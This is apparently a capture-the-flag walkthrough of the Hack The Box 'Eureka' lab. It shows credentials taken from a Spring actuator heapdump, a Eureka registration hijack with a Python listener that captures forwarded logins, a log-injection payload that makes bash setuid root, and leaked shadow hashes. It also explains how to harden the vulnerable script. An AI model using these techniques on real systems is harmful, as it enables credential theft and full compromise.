Basic information

Port scan

Ports 22 and 80 are open (the rest of what shows up is filtered):

$ nmap -sC -sV -Pn 10.10.11.66
Starting Nmap 7.95 ( https://nmap.org ) at 2025-05-03 09:07 JST
Nmap scan report for 10.10.11.66
Host is up (0.18s latency).
Not shown: 993 closed tcp ports (conn-refused)
PORT STATE SERVICE VERSION
4/tcp filtered unknown
22/tcp open ssh OpenSSH 8.2p1 Ubuntu 4ubuntu0.12 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 3072 d6:b2:10:42:32:35:4d:c9:ae:bd:3f:1f:58:65:ce:49 (RSA)
| 256 90:11:9d:67:b6:f6:64:d4:df:7f:ed:4a:90:2e:6d:7b (ECDSA)
|_ 256 94:37:d3:42:95:5d:ad:f7:79:73:a6:37:94:45:ad:47 (ED25519)
80/tcp open http nginx 1.18.0 (Ubuntu)
|_http-server-header: nginx/1.18.0 (Ubuntu)
|_http-title: Did not follow redirect to http://furni.htb/
548/tcp filtered afp
4444/tcp filtered krb524
5959/tcp filtered unknown
14442/tcp filtered unknown
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 60.70 seconds

80

The site redirects to furni.htb, so a hosts entry is needed:

10.10.11.66 furni.htb

A furniture-themed website:

actuator

The actuator endpoint is easy to spot with a Burp extension; even with an ordinary directory scan, the 404 page gives away that the backend is Spring Boot:

heapdump

The actuator heapdump is exposed, and a password can be pulled out of it:

java -jar JDumpSpider-1.1-SNAPSHOT-full.jar heapdump

password = 0sc@r190_S0l!dP@sswd
username = oscar190
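JDumpSpider parses the HPROF file properly; when it isn't to hand, a strings-style scan of the raw dump usually still finds the credential. The following is an added example, not the page's tooling: it pulls printable runs out of any binary blob and, for every string containing a credential keyword, reports the strings that follow it (in a heap dump a key and its value are often adjacent). SAMPLE_DUMP is a constructed stand-in, not a real heap dump.

```python
import re

# Runs of >= 4 printable ASCII bytes, like strings(1)
PRINTABLE = re.compile(rb"[\x20-\x7e]{4,}")
KEYWORDS = ("password", "passwd", "secret", "token", "username", "datasource")

# Constructed stand-in for a heap dump: a few string records separated by
# non-printable bytes. Not a real HPROF file.
SAMPLE_DUMP = (
    b"JAVA PROFILE 1.0.2\x00\x00\x01\x02"
    b"spring.datasource.password\x00\x0bSuperS3cret\x00\x00"
    b"username\x00\x06dbuser\x00\x01\xffjunk\x00"
)


def printable_strings(blob: bytes) -> list:
    """Return every printable run in the blob, in file order."""
    return [m.group().decode("ascii") for m in PRINTABLE.finditer(blob)]


def find_credential_hints(blob: bytes, window: int = 3) -> list:
    """For each string that contains a credential keyword, return it together
    with the `window` strings that follow it; the value is usually in there."""
    strs = printable_strings(blob)
    hits = []
    for i, s in enumerate(strs):
        if any(k in s.lower() for k in KEYWORDS):
            hits.append((s, strs[i + 1 : i + 1 + window]))
    return hits


if __name__ == "__main__":
    import sys

    # Usage: python3 dumpscan.py heapdump   (falls back to the constructed sample)
    data = open(sys.argv[1], "rb").read() if len(sys.argv) > 1 else SAMPLE_DUMP
    for key, following in find_credential_hints(data):
        print(f"{key!r} -> {following}")
```

Expect false positives on a real dump (framework property names, class names); the point is to shrink a few hundred MB of heap to a screen of candidates.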

oscar190

SSH in with the oscar190 credentials. Checking the listening sockets reveals port 8761, which the earlier port scan did not show:

8761

Given that the stack is Spring and the box is called Eureka, 8761 should be Eureka (its default port); it asks for credentials.

Eureka

The usual file digging turns up the Eureka credentials in the gateway's config:

oscar190@eureka:/var/www/web/cloud-gateway/src/main/resources$ cat application.yaml

defaultZone: http://EurekaSrvr:0scarPWDisTheB3st@localhost:8761/eureka/

Eureka

Log in to Eureka with the credentials obtained:

A quick search turns up attack techniques against Eureka.

The rough flow: register our own host as an instance of the app the gateway routes to (USER-MANAGEMENT-SERVICE), pointing at a listener on our port 4444, then remove the real instance so the gateway forwards that app's traffic, login requests included, to us and we receive the credentials:

# 添加instance
curl -X POST http://EurekaSrvr:0scarPWDisTheB3st@furni.htb:8761/eureka/apps/USER-MANAGEMENT-SERVICE -H 'Content-Type: application/json' -d '{
"instance": {
"instanceId": "USER-MANAGEMENT-SERVICE",
"hostName": "10.10.14.3",
"app": "USER-MANAGEMENT-SERVICE",
"ipAddr": "10.10.14.3",
"vipAddress": "USER-MANAGEMENT-SERVICE",
"secureVipAddress": "USER-MANAGEMENT-SERVICE",
"status": "UP",
"port": { "$": 4444, "@enabled": "true" },
"dataCenterInfo": {
"@class": "com.netflix.appinfo.InstanceInfo$DefaultDataCenterInfo",
"name": "MyOwn"
}
}
}'

# 删除原有instance
curl -su EurekaSrvr:0scarPWDisTheB3st \
-X DELETE \
'http://furni.htb:8761/eureka/apps/USER-MANAGEMENT-SERVICE/localhost:USER-MANAGEMENT-SERVICE:8081'

username=miranda.wise@furni.htb
password=IL!veT0Be&BeT0L0ve
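What runs on the attacker side of that trick is a listener on 4444 that accepts whatever the gateway forwards, answers 200 so the forward does not error, and pulls the credentials out of the request. The code below is an added example, not the page's own; it builds the same registration body as the curl above and parses one forwarded request (urlencoded form, JSON body or Basic auth header). SAMPLE_REQUEST is a constructed request, and the listener is one-shot.

```python
import base64
import json
import re
import socket
from urllib.parse import parse_qs


def rogue_instance(app: str, attacker_ip: str, port: int) -> dict:
    """Eureka registration body pointing `app` at the attacker's listener
    (same fields as the curl in the writeup)."""
    return {
        "instance": {
            "instanceId": app,
            "hostName": attacker_ip,
            "app": app,
            "ipAddr": attacker_ip,
            "vipAddress": app,
            "secureVipAddress": app,
            "status": "UP",
            "port": {"$": port, "@enabled": "true"},
            "dataCenterInfo": {
                "@class": "com.netflix.appinfo.InstanceInfo$DefaultDataCenterInfo",
                "name": "MyOwn",
            },
        }
    }


def parse_captured_login(raw: bytes) -> dict:
    """Extract credential-bearing fields from one raw HTTP request."""
    head, _, body = raw.partition(b"\r\n\r\n")
    lines = head.decode("latin-1").split("\r\n")
    method, target = lines[0].split(" ")[:2]
    headers = {}
    for h in lines[1:]:
        k, _, v = h.partition(":")
        headers[k.strip().lower()] = v.strip()
    out = {"method": method, "target": target, "form": {}, "basic": None}
    ctype = headers.get("content-type", "")
    if ctype.startswith("application/x-www-form-urlencoded"):
        out["form"] = {k: v[0] for k, v in parse_qs(body.decode("latin-1")).items()}
    elif ctype.startswith("application/json") and body.strip():
        out["form"] = json.loads(body)
    auth = headers.get("authorization", "")
    if auth[:6].lower() == "basic ":
        out["basic"] = base64.b64decode(auth[6:]).decode("latin-1")
    return out


def capture_once(port: int = 4444, timeout: float = 600) -> dict:
    """Accept one forwarded request, read headers plus Content-Length bytes of
    body, reply 200 so the gateway sees a healthy upstream, return the parse."""
    with socket.socket() as srv:
        srv.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
        srv.bind(("0.0.0.0", port))
        srv.listen(1)
        srv.settimeout(timeout)
        conn, _peer = srv.accept()
        with conn:
            data = b""
            while b"\r\n\r\n" not in data:
                chunk = conn.recv(4096)
                if not chunk:
                    break
                data += chunk
            head, _, body = data.partition(b"\r\n\r\n")
            m = re.search(rb"(?i)content-length:\s*(\d+)", head)
            need = int(m.group(1)) if m else 0
            while len(body) < need:
                chunk = conn.recv(4096)
                if not chunk:
                    break
                body += chunk
            conn.sendall(b"HTTP/1.1 200 OK\r\nContent-Length: 0\r\nConnection: close\r\n\r\n")
            return parse_captured_login(head + b"\r\n\r\n" + body)


# Constructed: the shape of a login form POST a gateway would forward
SAMPLE_REQUEST = (
    b"POST /login HTTP/1.1\r\n"
    b"Host: 10.10.14.3:4444\r\n"
    b"Content-Type: application/x-www-form-urlencoded\r\n"
    b"Content-Length: 44\r\n"
    b"\r\n"
    b"username=alice%40example.com&password=s3cret"
)

if __name__ == "__main__":
    print(json.dumps(capture_once(), indent=2))
```

Order matters: start the listener first, then register the rogue instance and delete the real one, otherwise the gateway gets a connection refused and may mark the instance down before the login arrives.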

user flag

Log in with the username and password obtained; note that the local username is slightly different, miranda-wise:

Privilege escalation info

The usual pspy run shows root periodically executing /opt/log_analyse.sh to analyse a specific log file:

Reading log_analyse.sh reveals an obvious command injection: the HTTP status code is taken straight from the log file and used without validation:

Privilege escalation & root flag

So we write a malicious log line and wait for the scheduled run to trigger it. The x[$(...)] shape is the classic payload for a value bash evaluates in an arithmetic context (e.g. an -eq comparison): the array subscript is expanded, command substitution included. Once it fires, bash -p gives a root shell:

rm -f /var/www/web/user-management-service/log/application.log

echo 'HTTP Status: x[$(chmod +s /bin/bash)]' > /var/www/web/user-management-service/log/application.log
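To see the bug class in isolation, and what the fix looks like, here is an added example that is not the page's code. The page does not reproduce log_analyse.sh, so the vulnerable snippet is my reconstruction of the pattern (a log value fed to -eq inside [[ ]]); the hardened snippet whitelists the value before it reaches an arithmetic context. Both are driven from Python so the payload can use a harmless touch instead of chmod +s.

```python
import os
import re
import shutil
import subprocess
import tempfile

BASH_AVAILABLE = shutil.which("bash") is not None

# Reconstructed vulnerable pattern (assumption, not the box's actual script).
# Inside [[ ]], -eq evaluates both operands arithmetically; an array subscript
# in an arithmetic context is expanded, including $(...) substitution.
VULNERABLE_SNIPPET = r'''
line="$1"
code="${line#HTTP Status: }"
if [[ "$code" -eq 200 ]]; then
  echo "ok: $code"
fi
'''

# Hardened form: require exactly three digits first. && inside [[ ]]
# short-circuits, so -eq never sees a non-numeric value.
HARDENED_SNIPPET = r'''
line="$1"
code="${line#HTTP Status: }"
if [[ "$code" =~ ^[0-9]{3}$ && "$code" -eq 200 ]]; then
  echo "ok: $code"
fi
'''


def run_bash_check(snippet: str, log_line: str) -> None:
    """Run one snippet with the log line as $1, discarding its output."""
    subprocess.run(
        ["bash", "-c", snippet, "log_analyse", log_line],
        stdout=subprocess.DEVNULL, stderr=subprocess.DEVNULL, check=False,
    )


def injection_fires(snippet: str) -> bool:
    """Feed a constructed line in the writeup's x[$(...)] shape, with touch
    in place of chmod +s; True if the embedded command actually ran."""
    with tempfile.TemporaryDirectory() as tmp:
        marker = os.path.join(tmp, "marker")
        run_bash_check(snippet, f"HTTP Status: x[$(touch {marker})]")
        return os.path.exists(marker)


# Python-side equivalent of the whitelist, for a log parser written in Python
STATUS_RE = re.compile(r"^HTTP Status: ([1-5][0-9]{2})$")


def extract_status_safe(log_line: str):
    """Return the 3-digit status code, or None for anything that is not one."""
    m = STATUS_RE.match(log_line)
    return m.group(1) if m else None


if __name__ == "__main__":
    if BASH_AVAILABLE:
        print("vulnerable snippet ran the payload:", injection_fires(VULNERABLE_SNIPPET))
        print("hardened snippet ran the payload:  ", injection_fires(HARDENED_SNIPPET))
    print(extract_status_safe("HTTP Status: 200"), extract_status_safe("HTTP Status: x[$(id)]"))
```

The same goes for (( ... )), let, and indexed array subscripts: any untrusted string reaching bash arithmetic needs a numeric whitelist first, and a root cron job reading a log writable by a low-privileged user is the setup that turns it into a full compromise.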

shadow

root:$6$OBLuDSnSI6fzrKsf$u9QRtUqJYklvj0ve0W792/K0OFtjkezL5d/glicQuh.wd2Zghc5DU5AR8wy3WqSN4XE4URKuT2Q.TvVn8V6aG.:19947:0:99999:7:::
oscar190:$6$CCVgNnsseJFcoNGs$gzae.Om25l/QR2NNsAEeulOjuPVf.UxaTupSl.TIePjM47QM1PvPaFLY2I/BTM0kyltIHJ7MB3L8rBAnu8e501:19936:0:99999:7:::
miranda-wise:$6$cceIW.FRVwHUaXms$/A4OpW8llje8ChgjPMbb81eEs.SiaivbvJyoOFtDmF9loeQ.tU3G6yMQz3B5tThwjgPr7j/XZV4TrbqQhKTif1:19936:0:99999:7:::

References